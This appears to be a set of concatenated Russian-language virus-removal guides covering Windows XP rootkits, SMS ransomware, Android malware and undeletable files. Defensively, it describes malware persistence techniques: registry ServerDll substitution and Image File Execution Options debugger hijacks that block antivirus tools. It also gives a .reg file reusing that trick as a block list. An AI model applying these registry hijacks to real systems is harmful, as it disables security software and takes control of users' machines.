используемой WFP. Для хранения копий файлов используется папка \system32\dllcache и, отчасти, \Windows\driver cache. При удалении или замене одного из системных файлов, WFP автоматически копирует «правильную» его копию из папки \dllcache. Если указанный файл отсутствует в папке \dllcache , то Windows XP просит вставить в привод компакт-дисков установочный компакт-диск Windows XP. Попробуйте удалить vga.sys из \system32, и система тут же его восстановит, используя копию из dllcache. А ситуация, когда, при работающей системе восстановления файлов, файл драйвера есть в \dllcache и его не видно в \system32 — это тоже дополнительный признак наличия руткита в системе. Удаляем вирус из системы. &nbsp &nbsp Осталось выполнить самое важное действие — удалить вирус. Самый простой и надежный способ — загрузиться в другой, незараженной операционной системе и запретить старт драйверов руткита. Воспользуемся стандартной консолью восстановления Windows. Берем установочный диск Windows XP и загружаемся с него. На первом экране выбираем 2-й пункт меню — жмем R. Выбираем систему (если их несколько): Вводим пароль администратора. Список драйверов и служб можно просмотреть с помощью команды listsvc: В самом деле, в списке присутствует Yoy46, правда отсутствует grande48, что говорит о том, что файл драйвера grande48.sys скрытно присутствует в системе, но не загружается: Консоль восстановления позволяет запрещать или разрешать запуск драйверов и служб с помощью команд disable и enable. Запрещаем старт Yoy46 командой: disable Yoy46 &nbsp &nbsp Водим команду EXIT и система уходит на перезагрузку. После перезагрузки драйвер руткита не будет загружен, что позволит легко удалить его файлы и очистить реестр от его записей. Можно проделать это вручную, а можно использовать какой-нибудь антивирус. Наиболее эффективным, с моей точки зрения, будет бесплатный сканер на основе всем известного антивируса Dr.Web Игоря Данилова. Скачать можно отсюда — http://freedrweb.ru &nbsp &nbsp Там же можно скачать «Dr.Web LiveCD» — образ диска, который позволяет восстановить работоспособность системы, пораженной действиями вирусов, на рабочих станциях и серверах под управлением Windows\Unix, скопировать важную информацию на сменные носители либо другой компьютер, если действия вредоносных программ сделали невозможным загрузку компьютера. Dr.Web LiveCD поможет не только очистить компьютер от инфицированных и подозрительных файлов, но и попытается вылечить зараженные объекты. Для удаления вируса нужно скачать с сайта DrWeb образ (файл с расширением .iso) и записать его на CD. Будет создан загрузочный диск, загрузившись с которого, руководствуетесь простым и понятным меню. &nbsp &nbsp Если по каким-либо причинам, нет возможности воспользоваться Dr.Web LiveCD, можно попробовать антивирусный сканер Dr.Web CureIt!, который можно запустить, загрузившись в другой ОС, например, с использованием Winternals ERD Commander. Для сканирования зараженной системы необходимо указать именно ее жесткий диск (Режим «Выборочная проверка»). Сканер поможет вам найти файлы вируса, и вам останется лишь удалить связанные с ним записи из реестра. &nbsp &nbsp Поскольку вирусы научились прописываться на запуск в безопасном режиме загрузки, не мешает проверить ветку реестра: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\SafeBoot Разделы: Minimal — список драйверов и служб запускаемых в безопасном режиме (Safe Mode) Network — то же, но с поддержкой сети. Добавлю, что существует новый класс rootkit, представителем которого является BackDoor.MaosBoot, появившийся в конце 2007г. Эта троянская программа прописывает себя в загрузочный сектор жесткого диска и обеспечивает скрытую установку своего драйвера в памяти. Сам Rootkit-драйвер напрямую записан в последние секторы физического диска, минуя файловую систему, чем и скрывает свое присутствие на диске. В общем-то, принцип не новый, лет десять назад вредоносные программы подобным образом маскировались на резервных дорожках дискет и жестких дисков, однако оказался очень эффективным, поскольку большинство антивирусов с задачей удаления BackDoor.MaosBoot до сих пор не справляются. Упоминаемый выше RootkitRevealer загрузочный сектор не проверяет, а секторы в конце диска для него никак не связаны с файловой системой и , естественно, такой руткит он не обнаружит. Правда, Dr.Web (а, следовательно, и Cureit) с BackDoor.MaosBoot вполне справляется. &nbsp &nbsp Если у вас возникли сомнения относительно какого-либо файла, то можно воспользоваться бесплатной онлайновой антивирусной службой virustotal.com. Через специальную форму на главной странице сайта закачиваете подозрительный файл и ждете результатов. Сервисом virustotal используются консольные версии множества антивирусов для проверки вашего подозреваемого файла. Результаты выводятся на экран. Если файл является вредоносным, то с большой долей вероятности, вы сможете это определить. В какой-то степени сервис можно использовать для выбора «лучшего антивируса». Здесь ссылка на одну из веток форума сайта virusinfo.info, где пользователи выкладывают ссылки на различные ресурсы посвященные антивирусной защите, в т.ч. и онлайн — проверок компьютера, браузера, файлов… &nbsp &nbsp Иногда, в результате некорректных действий вируса (или антивируса) система вообще перестает загружаться. Приведу характерный пример. Вредоносные программы пытаются внедриться в систему, используя различные, в том числе, довольно необычные способы. В процессе начальной загрузки, еще до регистрации пользователя, запускается «Диспетчер сеансов» (\SystemRoot\System32\smss.exe) , задача которого — запустить высокоуровневые подсистемы и сервисы (службы) операционной системы. На этом этапе запускаются процессы CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), и оставшиеся службы с параметром Start=2 из раздела реестра HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services &nbsp &nbsp Информация, предназначенная для диспетчера сеансов, находится в ключе реестра HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager Одним из способов внедрения в систему, является подмена dll-файла для CSRSS. Если вы посмотрите содержимое записи HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\SubSystems то найдете значения ServerDll=basesrv, ServerDll=winsrv. Библиотеки basesrv.dll и winsrv.dll — это «правильные» файлы системы, загружаемые службой CSRSS на обычной (незараженной) системе. Эту запись в реестре можно подправить на запись, обеспечивающую загрузку, например, вместо basesrv.dll, вредоносной basepvllk32.dll: ServerDll=basepvllk32 (или какую либо другую dll, отличную от basesrv и winsrv) Что обеспечит, при следующей перезагрузке, получение управления вредоносной программе. Если же ваш антивирус обнаружит и удалит внедренную basepvllk32, оставив нетронутой запись в реестре, то загрузка системы завершится «синим экраном смерти» (BSOD) с ошибкой STOP c000135 и сообщением о невозможности загрузить basepvllk32. Поправить ситуацию можно так: — загрузится в консоль восстановления (или в любой другой системе), и скопировать файл basesrv.dll из папки C:\WINDOWS\system32 в ту же папку под именем basepvllk32.dll. После чего система загрузится и можно будет вручную подправить запись в реестре. — загрузиться с использованием Winternals ERD Commander и исправить запись в реестре на ServerDll=basesrv. Или выполнить откат системы с использованием точки восстановления. &nbsp &nbsp Еще один характерный пример. Вредоносная программ регистрируется как отладчик процесса explorer.exe, создавая в реестре запись типа: HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe «Debugger»=»C:\Program Files\Microsoft Common\wuauclt.exe» Удаление wuauclt.exe антивирусом без удаления записи в реестре приводит к невозможности запуска explorer.exe. В результате вы получаете пустой рабочий стол, без каких-либо кнопок и ярлыков. Выйти из положения можно используя комбинацию клавиш CTRL-ALT-DEL. Выбираете «Диспетчер задач» — «Новая задача» — «Обзор» — находите и запускаете редактор реестра regedit.exe. Затем удаляете ключ HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe и перезагружаетесь. &nbsp &nbsp В случае, когда вы точно знаете время заражения системы, откат на точку восстановления до этого события, является довольно надежным способом избавления от заразы. Иногда есть смысл выполнять не полный откат, а частичный, с восстановлением файла реестра SYSTEM, как это описано в статье «Проблемы с загрузкой ОС» раздела «Windows» &nbsp &nbsp == Май 2008. == Дополнение &nbsp &nbsp Это дополнение возникло через год после написания основной статьи. Здесь я решил разместить наиболее интересные решения, возникшие в процессе борьбы с вредоносным программным обеспечением. Что-то вроде коротких заметок. После удаления вируса ни один антивирус не работает. &nbsp &nbsp Случай интересен тем, что способ блокировки антивирусного программного обеспечения можно использовать и в борьбе с исполняемыми файлами вирусов. Началось все с того, что после удаления довольно примитивного вируса не заработал лицензионный «Стрим Антивирус». Переустановки с чисткой реестра не помогли. Попытка установки Avira Antivir Personal Free закончилась успешно, но сам антивирус не запустился. В системном журнале было сообщение о таймауте при запуске службы «Avira Antivir Guard». Перезапуск вручную заканчивался той же ошибкой. Причем, никаких лишних процессов в системе не выполнялось. Была стопроцентная уверенность — вирусов, руткитов и прочей гадости (Malware) в системе нет. &nbsp &nbsp В какой-то момент попробовал запустить антивирусную утилиту AVZ. Принцип работы AVZ во многом основан на поиске в изучаемой системе разнообразных аномалий. С одной стороны, это помогает в поиске Malware, но с другой вполне закономерны подозрения к компонентам антивирусов, антишпионов и прочего легитимного ПО, активно взаимодействующего с системой. Для подавления реагирования AVZ на легитимные объекты и упрощения анализа результатов проверки системы за счет отметки легитимных объектов цветом и их фильтрации из логов, применяется база безопасных файлов AVZ. С недавнего времени запущен полностью автоматический сервис, позволяющий всем желающим прислать файлы для пополнения этой базы. Но : исполняемый файл avz.exe не запустился ! Переименовываю avz.exe в musor.exe — все прекрасно запускается. В очередной раз AVZ оказался незаменимым помощником в решении проблемы. При выполнении проверок в результатах появилась строки: Опасно — отладчик процесса «avz.exe»=»ntsd-d» Опасно — отладчик процесса «avguard.exe»=»ntsd-d» :. Это была уже серьезная зацепка. Поиск в реестре по контексту «avz» привел к обнаружению в ветке HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options раздела с именем avz.exe, содержащем строковый параметр с именем «Debugger» и значением «ntsd -d». И, как выяснилось позже, в указанной ветке присутствовал не только раздел «avz.exe», но и разделы с именами исполняемых модулей практически всех известных антивирусов и некоторых утилит мониторинга системы. Сам ntsd.exe — вполне легальный отладчик Windows, стандартно присутствующий во всех версиях ОС, но подобная запись в реестре приводит к невозможности запуска приложения, имя исполняемого файла которого совпадает с именем раздела ???.exe. &nbsp &nbsp После удаления из реестра всех разделов, c именем ???.exe и содержащих запись «Debugger» = «ntsd -d» работоспособность системы полностью восстановилась. В результате анализа ситуации с использованием параметра «ntsd -d» для блокировки запуска исполняемых файлов, появилась мысль использовать этот же прием для борьбы с самими вирусами. Конечно, это не панацея, но в какой-то степени может снизить угрозу заражения компьютера вирусами с известными именами исполняемых файлов. Для того, чтобы в системе невозможно было выполнить файлы с именами ntos.exe, file.exe, system32.exe и т.п. можно создать reg-файл для импорта в реестр: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NTOS.EXE] «Debugger»=»ntsd -d» [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FILE.EXE] «Debugger»=»ntsd -d» [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SYSTEM32.EXE] «Debugger»=»ntsd -d» :.. и т.д. Обратите внимание, на то, что имя раздела не содержат пути файла, поэтому данный способ нельзя применять для файлов вирусов, имена которых совпадают с именами легальных исполняемых файлов, но сами файлы нестандартно размещены в файловой системе. Например, проводник Explorer.exe находится в папке \WINDOWS\, а вирус располагается где-то в другом месте — в корне диска, в папке \temp, \windows\system32\ Если вы создадите раздел с именем «Explorer.exe» — то после входа в систему вы получите пустой рабочий стол, поскольку проводник не запустится. Хуже того, если вы создадите раздел, имя которого совпадает с именем системной службы (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то получите рухнувшую систему. Если вирус находится в C:\temp\winlogon.exe, а легальный модуль входа в систему C:\WINDOWS\SYSTEM32\winlogon.exe, создание раздела с именем winlogon.exe приведет к невозможности запуска службы winlogon и краху системы с синим экраном смерти (BSOD). По этой ссылке вы можете скачать .reg-файл с подборкой из имен файлов, наиболее часто используемых актуальными вирусами. После импорта в реестр, в случае попытки выполнения файла с именем, присутствующем в заготовке, вы получите подобное окно: Если у вас возникнут проблемы с легальной программой, имя исполняемого файла которой совпало с именем, используемым вредоносным ПО, откройте раздел реестра HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options и удалите подраздел с данным именем. Для удобства, имена с параметром «ntsd -d» я выделил заглавными буквами. Вирус СМС-вымогатель. &nbsp &nbsp Основная цель современных вирусописателей — заработать деньги любым способом. В последнее время участилось использование вируса для блокировки рабочего стола пользователя и вывод сообщения, предлагающего отправить СМС на определенный (как правило, короткий) номер для разблокировки. Подобное сообщение может сопровождаться отображением какого — нибудь порнобаннера или предупреждения об использовании нелицензионного программного обеспечения, или даже о потере данных при попытке переустановки системы. Встречаются даже вирусы, нагло заявляющие, что «Данный программный продукт не является вирусом». Еще одна особенность этой разновидности вредоносного ПО заключается в том, что максимально затруднен запуск каких-либо программ, не работают стандартные комбинации клавиш, запрещено использование редактора реестра, невозможно зайти на антивирусные сайты и т.п. Подобные вирусы не маскируют, а наоборот — демонстрируют свое присутствие в системе и максимально затрудняют возможность выполнить любые действия на компьютере. Практически, рабочий стол пользователя заблокирован, и никакие действия невозможны. Другими словами — пользователю настойчиво указывается единственный выход — отправить СМС. После отправки с баланса мобильного телефона будет снята некоторая сумма в пользу мошенников. Код разблокировки вы, скорее всего, не получите, и вернетесь к той же ситуации. Хотя, справедливости ради, стоит отметить, что ранние разновидности вируса-вымогателя (Trojan.Winlock) вели себя довольно «прилично» — самоуничтожались через какое-то время (несколько часов) или сразу после ввода полученного кода разблокировки. &nbsp &nbsp На сайте антивирусной компании «Доктор Веб» есть специальная форма для генерации кода разблокировки. Перейти к форме сайта DrWeb Аналогичная форма на сайте лаборатории Касперского &nbsp &nbsp Но, все же, надеяться на то, что запрашиваемый вирусом код, подойдет в каждом конкретном случае, не стоит. Как не стоит надеяться на честное самоуничтожение вируса, и тем более, не стоит отправлять СМС. Любой вирус можно удалить, даже если он не обнаруживается антивирусами. Методики удаления вируса-вымогателя ничем не отличаются от методик удаления любого другого вредоносного ПО, с одним, пожалуй, отличием — не стоит тратить время на попытки справиться с дрянью в среде зараженной системы, разве что для развития собственных навыков и пополнения знаний. Наиболее простой и эффективный путь — загрузиться с использованием другой, незараженной системы и, подключившись к зараженной, удалить файлы вируса и исправить внесенные им записи в реестре. Об этом я уже писал выше, в основной части статьи, а здесь попытаюсь просто изложить несколько кратких вариантов удаления вируса. Использование Dr.Web LiveCD — самый простой и не требующий специальных знаний способ. Скачиваете iso-образ CD, записываете его на болванку, загружаетесь с CD-ROM и запускаете сканер. Использование Winternals ERD Commander. Загружаетесь с него, подключившись к зараженной системе, и выполняете откат на контрольную точку восстановления с датой, когда заражения еще не было. Выбираете меню System Tools — System Restore. Если откат средствами ERD Commander’а выполнить невозможно, попробуйте вручную найти файлы реестра в данных контрольных точек и восстановить их в каталог Windows. Как это сделать я подробно описал в статье «Работа с реестром». Загрузка в другой ОС и ручное удаление вируса. Самый сложный, но самый эффективный способ. В качестве другой ОС удобнее всего использовать тот же ERD Commander. Методика обнаружения и удаления вируса может быть следующей: — Переходите на диск зараженной системы и просматриваете системные каталоги на наличие исполняемых файлов и файлов драйверов с датой создания близкой к дате заражения. Перемещаете эти файлы в отдельную папку. Обратите внимание на каталоги \Windows \Windows\system32 \Windows\system32\drivers \Windows\Tasks\ \RECYCLER \System Volume Information Каталоги пользователей \Documents And Settings\All Users и \Documents And Settings\имя пользователя Очень удобно использовать для поиска таких файлов FAR Manager, с включенной сортировкой по дате для панели, где отображается содержимое каталога (комбинация CTRL-F5). Особое внимание стоит обратить на скрытые исполняемые файлы. Существует также эффективная и простая утилита от Nirsoft — SearchMyFiles, применение которой позволяет, в подавляющем большинстве случаев, легко обнаружить вредоносные файлы даже без использования антивируса. Способ обнаружения вредоносных файлов по времени создания (Creation time) — Подключаетесь к реестру зараженной системы и ищете в нем ссылки на имена этих файлов. Сам реестр не мешает предварительно скопировать (полностью или, по крайней мере, те части, где встречаются выше указанные ссылки). Сами ссылки удаляете или изменяете в них имена файлов на другие, например — file.exe на file.ex_, server.dll на server.dl_, driver.sys на driver.sy_. Данный способ не требует особых знаний и в случаях, когда вирус не меняет дату модификации своих файлов (а это пока встречается очень редко) — дает положительный эффект. Даже если вирус не обнаруживается антивирусами. — Если предыдущие методики не дали результата, остается одно — ручной поиск возможных вариантов запуска вируса. В меню Administrative Tools ERD Commander’а имеются пункты: Autoruns — информация о параметрах запуска приложений и оболочке пользователя. Service and Driver Manager — информация о службах и драйверах системы. Полезные ссылки по теме. Простейшие способы нейтрализации вирусов в среде Windows 7 — В качестве продолжения темы — как избавиться от вирусов с помощью стандартных средств операционной системы Windows Vista \ Windows 7. Использование безопасного режима с поддержкой командной строки. Использование загрузочного диска Winternals ERD Commander — Подробная инструкция по применению диска аварийного восстановления системы, созданного на базе Microsoft Diagnostic and Recovery Toolset (MS DaRT) . Сайт Олега Зайцева, автора AVZ. — Посвящен информационной безопасности, и в частности — применению одной из наиболее эффективных антивирусных утилит AVZ. Восстановление системы после вирусного заражения Как восстановить работоспособность Windows после удаления вируса, повредившего некоторые настройки. Помогает в случаях, когда не запускаются программы, при подмене страниц, открываемых обозревателем, подмене домашней страницы, страницы поиска, при изменении настроек рабочего стола, невозможности запуска редактора реестра, отсутствии доступа в Интернет, недоступности некоторых сайтов и т.п. Если вы желаете поделиться ссылкой на эту страницу в своей социальной сети, пользуйтесь кнопкой «Поделиться» В начало страницы &nbsp&nbsp&nbsp | &nbsp&nbsp&nbsp На главную страницу сайта

Как удалить вирус с компьютера с помощью программ и в ручную

В данной статье попробую объяснить что такое система, вирус и как его удалить не переустанавливая систему (Windows). Итак, система — это сборник кодов где каждый код отвечает за определенное действие, например: запуск системы, установка программ и т.д.. Если в любой из этих кодов внести изменения, например: в код запуска добавить путь к картинке на которой изображено сообщение о том что ваша система заблокирована, то вместо рабочего стола на экране будет появляться данное предупреждение — вот это и есть вирус т.е. вредоносный код. Все эти коды находятся в реестре (мозг системы). При установке программ, игр и т.п. в реестр вносятся изменения для их корректной работы. Во время данной установки многие не читают раскрывающие окна и нажимают далее, а в одном из окон может стоять галочка о согласии на установку дополнительного ПО (программного обеспечения) которое может оказаться вредоносным кодом или программой. Заменить код могут многими способами и даже порой опытный пользователь может проглядеть этот момент.

Как же узнать что ПК заражен?

Даже если у Вас стоит хороший лицензионный антивирус со встроенным файрволом (исключает безконтрольный доступ в интернет) это не спасет систему от пользователя, который рано или поздно разрешит доступ вредоносной программе внести изменение в реестр. Например: Вы скачали программу, которую нигде не смогли найти кроме как на одном сайте и она настолько интересна вам, что вы хотите установить ее прямо сейчас. Запускаете скаченный файл для установки, а в итоге ничего не происходит и вы думаете что это «пустышка». На самом деле код уже прописался в реестре и теперь остается только ждать проблем, например:

• кража паролей, личной и служебной информации
  
• размножение файлов с целью забить все свободное пространство
  
• блокировка некоторых функций и возможностей системы
  
• удаление или шифрование ваших данных (фото, видео, документы)
  
• преждевременный износ и вывод из строя комплектующих ПК
  

Всех не перечислить, но все они плохо влияют на работу системы. И если вы почувствовали что система ведет себя не так как обычно, то необходимо просканировать систему с помощью обновленных антивирусных сканеров, например: Kaspersky Virus Removal Tool, Dr.Web CureIt!, ESET Online Scanner.

Порядок удаления вирусов

1. Отключаем автозапуск всех неизвестных нам процессов с помощью Autorun Organizer, если Вы сомневаетесь стоит ли удалить какую либо программу из автозапуска, то можете ее временно отключить.
2. Удаляем неизвестные и ненужные программы с помощью Soft Organizer (если программа предложит вам перезагрузку, то отказывайтесь до тех пор пока не удалите все ненужные программы, для того чтобы она подчистила реестр, но если вы не сильны в английском языке и все же перезагрузите пк, то не переживайте, при включении она вам напомнит о не до конца удаленных программах)

3. Заходим в скрытую папку «AppData» для чистки папки «temp» и удаления папок от ранее удаленных нами программ. Для этого нажимаем сочетание клавиш Win+R и в поле «открыть:» забиваем %appdata% или заходим в Пуск и в поле поиска забиваем «выполнить» и запускаем данную службу. Забиваем в пустое поле %appdata% и жмем ОК или Enter.

Прошивка и удаление вирусов с телефона на Android ОС

Как только не изощряются разработчики приложений зарабатывать деньги. И не всегда честными путями. Все больше набирают популярность вредоносные программы для android телефонов, или обычными словами — вирусы. Принцип работы таких приложений самый разнообразный — одни списывают деньги с карточки, другие сами отправляют смс, третьи блокируют работу телефона и т.д. В этой статье мы расскажем, как понять, есть ли вирус на телефоне и как с ним бороться, а также как обезопасить свой смартфон от установки вредоносного ПО.

1. Как узнать, если ли вирус на телефоне
2. Откуда берутся вирусы
3. Как удалить вирус с Android устройства
4. Нужен ли антивирус на телефоне

Примечание: далее речь только о телефонах и планшетах, работающих на системе Andorid.

Как понять, что на телефоне вирус

Вредоносные программы обычно работают в фоне, поэтому незаметны для пользователя. Но все же есть основные признаки, которые говорят о заражении телефона вирусом. Большая просьба к читателям дополнить нашу комментариями, если вы узнали новые симптомы заражения системы андроид.

1. Телефон постоянно скачивает файлы

В трее уведомлений постоянно отображается загрузка файлов. Что скачивает телефон, не всегда понятно. Это может быть обновление программ, загрузка ненужных файлов, в том числе и новых вирусов. В этом случае советуем зайти в папку Downloads и проверить список закачанных файлов. При попытке удалить их, телефон обычно выдает ошибку «Удаление невозможно» или что-то в таком роде.

2. Приложения сами устанавливаются на телефон

После скачивания программы сами устанавливаются на телефон. Зачастую это приложения на китайском языке, с содержанием порно, эротическими фотографиями, с многочисленной рекламой и баннерами, блокирующую работу телефона или планшета. Деинстраллировать такие программы или не получается, или после удаления они скачиваются снова. В результате рабочий стол телефона пестрит ярлычками «New», как на следующей картинке.

3. Непонятно куда уходят деньги со счета

Если Вы стали замечать, что на Вашем мобильном счете пропадают деньги, не спешите винить оператора. Конечно, стоит проверить свой тарифный план и узнать, на что тратились деньги. Если в этом списке есть исходящие SMS или MMS сообщения на коротки номера, которых Вы не отправляли — поздравляем, на телефоне вирус.

Дело в том, что при установке зараженных программ они по умолчанию спрашивают права на отправку смс. Обычно пользователи не читают условия и соглашаются со всеми пунктами. В результате телефон сам начинает скрытно отправлять смс-ки на платные номера, пока не закончатся деньги на счету.

4. Телефон сильно греется, тормозит или зависает

Такие симптомы могут наблюдаться не только на зараженных вирусом телефонах. Если модель сравнительно старая, система Андроид «засоряется» множеством файлов и начинает работать нестабильно. Это отдельный случай, а лечится устройство обычным сбросом к заводским установкам.

Но все чаще причиной таких проблем становится появление вирусов на телефоне. Это может сопровождаться большим расходом интернет трафика, и если бесплатные мегабайты заканчиваются, начинают сниматься деньги со счета. При этом смартфон сильно греется, долго загружается, вылетают приложения с ошибкой «Приложение такое-то прекратило работу».

  

 

Откуда берутся вирусы на телефоне

В основном вирусы попадают на устройство из-за невнимательности пользователя. Или из-за беспечности. Да и разработчики вирусов не дремлют — все более изощренными становятся их уловки. Среди основных источников заражения телефона вирусом можно выделить следующие:

1. Установка программ из неизвестных источников

Необходимость такого риска появляется, когда мы хотим поставить на телефон платную программу … бесплатно. Или обычными словами — крякнутую версию. Например, если нужно установить навигатор на телефон. В таком случае мы заходим в настройки устройства, раздел «Приложения», в котором первым пунктом ставим галочку «Неизвестные источники». Это позволит инсталлировать программы не только из официального источника, т.е. Play Market, но и с флешки или сразу с интернета. Вот тут и появляется опасность подхватить вирус. Не зря при включении пункта «Неизвестные источники» телефон предупреждает владельца, что установка программ из непроверенных источников небезопасна для его устройства.

► Как быть в таком случае? Конечно, лучше устанавливать программы только из Play Market. Но если уж жизнь заставляет воспользоваться крякнутой версией, то как минимум стоит скачивать ее с проверенного форума, предварительно почитав отзывы пользователей о программе. После этого галочку «Неизвестные источники» в настройках рекомендуем деактивировать.

2. Короткие ссылки во входящих смс или почте

Интернет спам в виде почты с заманчивыми предложениями, входящие смс-ки (причем даже от знакомых контактов — номер отправителя мошенники могут подделать), рекламные баннеры в играх — это основные источники ссылок, которые подстрекают пользователя кликнуть по ним. Вот только в результате пользователь вместо обещанных «интимных фото подруги» или «бесплатного подарка» попадает на страничку, откуда скачивается и устанавливается вирус на телефон. Обычно установку вируса сразу незаметно, и пользователь забывает про этот случай, а вирус тем временем делает свое дело.

► Рекомендуем игнорировать все входящие короткие ссылки или проверять их антивирусом, причем лучше на ПК. Не кликайте по рекламе в игрушках и программах, а особенно на сайтах с плохой репутацией. Если все же кликнули и телефон начинает переходить автоматически с одной ссылки на другую, потом третью, рекомендуем немедленно закрыть окно браузера, чтобы не дать шансов скачаться вирусу.

3. Предложение обновить программу или скачать антивирус  

  Вот Вы серфите по просторам интернета и на одном из сайтов выскакивает окно, в котором говорится, что нужно обновить программу. Или что Ваш телефон заражен вредоносным ПО и нужно скачать антивирус. Как правило, указанной программы может и не быть на Вашем устройстве, а под предлогом скачать защиту скачивается поддельное приложение с интерфейсом известного антивируса, но с противоположным назначением.

► Ни в коем случае не переходите по таким баннерам. Все приложения обновляются только через Play Market, причем автоматически (если включена такая опция в настройках телефона или планшета). Антивирус нужно скачивать тоже только с магазина. На вопрос, нужен ли антивирус на устройстве, читайте ниже в статье.

  

 

  

Как удалить вирус с телефона или планшета на Android  

1. Первым делом отключить сим карты, чтобы предотвратить списание денег со счета.
2. По возможности и необходимости сохранить всю важную информацию с устройства (контакты, фотографии и прочее).
3. Самый верный способ удалить вирус самостоятельно — сделать сброс телефона или планшета к заводским установкам. Внимание, вся информация при этом удаляется! Не забывайте сделать пункт 2 данного раздела.
4. Если сброс делать не хочется, нужно установить антивирус с Play Market. Дать однозначный ответ на вопрос «какой именно» мы не можем, ведь сначала появляется вирус, а уж потом пишется лекарство от него. Поэтому лучше пробовать по очереди две-три программы. При этом скачиваем один антивирус, отключаем Wi-Fi и сканируем телефон. Удаляем антивирус, включаем вай-фай и устанавливаем следующий. Повторяем процедуру.

Важно! Как показывает практика, множество вирусов уже не удаляется ни антивирусом, ни сбросом к заводским установкам. Это объясняется тем, что вредоносное ПО внедряется в системные файлы Android. В таком случае единственный вариант — это прошивка телефона с полным форматированием системы. Как самостоятельно прошить телефон на Андроид ОС лучше читать на тематических форумах. В этом деле много нюансов — внимательно читайте инструкции и комментарии к ним.

Или есть более быстрый вариант — отдать телефон на прошивку в наш сервисный центр. Стоимость такой процедуры обычно колеблется в пределах 200-250 гривен, но может быть и выше в зависимости от все тех же нюансов (например, телефон неофициальный с Европы или Штатов, редкий аппарат, был залочен под оператора и т.д.). Уточнить нюансы прошивки и стоимость можно напрямую у мастера по телефону или задать вопрос на сайте.

  

Уточнить стоимость

Узнать сколько стоит прошить телефон или планшет, можно ли удалить вирус, теперь можно напрямую у мастера

Задать вопрос

Отправить новой почтой

Если Вы не из Киева, можно отправить телефон или планшет в наш сервис “Новой почтой”. Оплата при получении из ремонта

Как отправить?

P.S. Нужен ли антивирус на телефоне

Как показывает практика, ни один антивирус не может гарантировать 100%-ю защиту. Более того, зачастую с него мало пользы, т.к. вирусы все равно пишутся быстрее, чем обновляется лекарство против них. Поэтому и получается, что антивирус только тормозит телефон без явной пользы для него. Лично я антивирусом не пользуюсь.

Автор статьи: Андрей Гуменюк, сервисный инженер ReMobile.

Смотрите также: 

Как удалить файлы, которые нельзя удалить

Последнее обновление 23 июня 2020 г., 09:24 Автор: Дэвид Уэбб .

Одна из наиболее распространенных проблем, возникающих при попытке очистить вашу систему, — это нежелание файла быть удаленным. Это может быть вызвано рядом факторов, включая ограничения файлов или папок, несовместимость системы, компьютерный вирус или доступ третьих лиц к файлу на общем компьютере. Если вы не можете окончательно удалить файл на своем компьютере, вот несколько вещей, на которые следует обратить внимание.

Удаление файла, который не удаляется

Убедитесь, что файл или папка не используются

Если вы используете общий компьютер, другой пользователь или программа может использовать файл / папку, которые вы пытаетесь удалить.

Попросите других пользователей закрыть свои активные программы и выйти из своей учетной записи. Затем вам следует перезагрузить компьютер , войти в свою учетную запись и снова попытаться удалить файл / папку.

Запустите вашу систему в безопасном режиме

Если ваша система или файл были заражены вирусом, использование Safe Mode может позволить вам удалить устойчивый файл, так как большинство вирусов активируются при работе в нормальном режиме .

Перезапустите вашу систему. Когда откроется первый экран, нажмите клавишу F8 на клавиатуре.

На экране будут перечислены различные варианты загрузки вашей системы. Используя стрелки на клавиатуре, выберите Safe Mode .

По завершении загрузки выберите файл / папку, которые необходимо удалить. Щелкните правой кнопкой мыши в файле и выберите опцию Удалить .

N.B. Не забудьте очистить корзину , щелкнув правой кнопкой мыши значок и выбрав опцию «Очистить корзину».

Загрузите или обновите антивирусную программу

Если ваша компьютерная система заражена, вы должны сначала загрузить антивирус , если у вас его еще нет.Если да, подумайте об обновлении текущей версии программного обеспечения и снова запустите процесс сканирования. Вот несколько советов по созданию хороших антивирусных программ:

BitDefender

BitDefender — это антивирусная и антишпионская программа, защищающая от фишинговых атак. Эта программа доступна как для коммерческого, так и для бесплатного пробного использования. Системные требования для BitDefender включают:

Windows 2000 с пакетом обновления 4

Windows XP с пакетом обновления 2 (32/64 бит)

Windows Vista (32/64 бит)

Касперский 7

Kaspersky 7 — это антивирусная и антишпионская программа, защищающая от червей и троянов.Эта программа имеет ряд системных и аппаратных требований, в том числе:

Microsoft Windows XP Professional x64, Microsoft Windows 2000 Professional (Service Pack 4 или выше), Microsoft Windows XP Professional (Service Pack 2 или выше), Microsoft Windows XP Home Edition (Service Pack 2 или выше), Microsoft Windows Vista, Microsoft Windows Vista x64.

50 МБ на жестком диске, проигрыватель компакт-дисков, подключение к Интернету, Internet Explorer 5.5 или выше, установщик Microsoft Windows 2.0.

Антивирус AVG 8

Anti-Virus 8 — это бесплатная антивирусная программа, совместимая с различными системами Windows, включая Windows 2000, Windows XP, Windows XP Pro x64, Windows Vista и Windows Vista x64.

Системные требования включают процессор Intel Pentium (300 МГц), 30 МБ на жестком диске, а также 256 МБ оперативной памяти.

Используйте блокнот

Вы можете попробовать использовать Блокнот, чтобы открыть файл, который вы хотите удалить, и обойти проводник Windows и его индексирование .

Откройте Блокнот и перейдите к Файл > Откройте .

Убедитесь, что для параметра Тип файла установлено значение Все файлы , а не только текстовые документы. После того, как вы найдете файл, который хотите удалить, щелкните правой кнопкой мыши и выберите Удалить . Не щелкайте файл дважды.

Не забудьте очистить корзину после завершения этого процесса.

Отключить службу индексирования

Нажмите кнопку Start и выберите Control Panel .Выберите Administrative Tools и перейдите на вкладку Services .

Найдите опцию Indexing , расположенную в нижней части окна. Нажмите кнопку Stop .

